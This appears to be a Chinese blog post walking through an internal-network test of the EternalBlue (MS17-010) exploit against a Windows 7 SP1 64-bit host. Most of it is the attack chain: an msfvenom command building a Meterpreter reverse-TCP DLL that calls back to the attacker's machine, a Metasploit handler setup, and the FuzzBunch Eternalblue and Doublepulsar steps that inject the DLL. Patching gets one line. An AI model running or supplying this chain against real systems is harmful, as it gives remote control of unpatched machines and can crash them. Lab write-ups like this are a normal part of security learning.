標籤:

(內網測試)Eternalblue(MS17-010)測試windows 7 sp1 64位

出了好幾天了,一直沒看,雖然網路上已經有很多類似文章不過我還是在這裡記錄一下測試的過程,當然還是內網測試,且在沒有防護下進行

kali linux :ip 192.168.0.107

目標機windows 7 sp1:ip 192.168.0.105

攻擊03:ip 192.168.0.106

微軟公告:Microsoft Security Bulletin MS17-010 - Critical

因為需要配合msf所以先生成一下DLL吧!

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT 4444 -f dll > testexp.dlln

接著先打開msf,進行配置

msfconsolen

使用hanlder模塊

use exploit/multi/hanldern

在設置payload

set payload windows/x64/meterpreter/reverse_tcpn

好,我們在看看需要設置的

show optionsn

埠默認就是4444不用設置,只需要在設置一下host

set LHOST 192.168.0.107n

ok,現在把生成好的dll拷貝回我們的03攻擊機上!

現在進入windows目錄,執行fb.py

第一步就是需要設置攻擊目標的ip和03攻擊機的ip了,這裡我們不使用這個輸入no

由於我們沒有D盤,這裡只能改一下設置了一個c盤的log(目錄可以自動創建)

這裡只有一個選擇就是創建項目,默認回車即可,然後輸入任意名稱

接著使用ETERNALBLUE這個模塊

use Eternalbluen

這裡需要注意下:

接下來就是使用msf生成的DLL了,使用Doublepulsar模塊

use Doublepulsarn

一路回車,到這裡還是需要注意一下選擇

選擇2(因為我們要用DLL嘛),並且設置DLL存放的目錄

kali上執行exploit

exploitn

回到03下在一路回車,最後輸入yes執行攻擊

最後攻擊成功

至於修復方法,我們可以360打個補丁就可以了!

最後說明一下:被攻擊的目標可能會重啟,或者藍屏等問題!


推薦閱讀:

NO.7 WebGoat還是蠻好的滲透練手工具
跟著安全牛大表哥學滲透
排名前20種功能強大的跨平台滲透測試工具
一次漫長的滲透經歷(幫女神解決問題。)

TAG:渗透测试 |